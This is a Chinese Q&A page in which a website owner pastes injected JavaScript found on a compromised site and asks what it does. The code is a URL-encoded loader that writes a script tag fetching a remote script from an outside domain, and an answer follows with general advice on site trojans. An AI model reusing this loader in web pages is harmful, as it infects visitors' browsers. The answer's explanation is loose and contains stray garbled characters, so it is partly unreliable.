网站可能被挂马,请问这段代码具体是什么意思?

网站可能被挂马,请问这段代码具体是什么意思?if(document.cookie.indexOf('logtime')==-1){varexpires=newDate()... 网站可能被挂马,请问这段代码具体是什么意思?
if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%65%72%72%6F%72%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
每次打开网站都会跳出一些交友、游戏等网页,发现一个js文件里多了这段代码,具体是什么含义?如何跳转到这些网址的?
展开
 我来答
匿名用户
2014-05-09
展开全部

这段代码是根据访问用户的cookies,进行跳转,%3C%73%63%72%69%70%74%20%74%79这些都是加了密的跳转网址、


网站被挂马,通常就是黑客利用网站程序或者是语言脚本解释的漏洞上传一些可以直接对站点文件进行修改的脚本木马,然后通过web形式去访问那个脚本木马来实现对当前的网站文件进行修改,比如加入一段广告代码,通常是iframe或者script。


想知道网站是否被挂马,有一个比较简单的方法,直接检查每个脚本文件最下方是否被加入了iframe或者script的代码,然后这段代码是否是程序员设计的时候添加的,程序员一看就能够知道。


防范的方式也简单:

1、程序代码漏洞,这需要有安全意识的程序员才能修复得饥巧了,通常是在出现被挂马以后才知道要针对哪方面入手修复;


2、也可以通过安全公司来解决,国内也就Sinesafe和绿盟等辩肢雹安全公司 比较专业.


3.服务器目录权限的“读”、“写”、“执行”,“是否允许脚携帆本”,等等,使用经营已久的虚拟空间提供商的空间,可以有效降低被挂马的几率。


我是从事IDC行业的.以上这些也是平时工作中经常遇到的问题.希望我的回答对你有所帮助.

推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式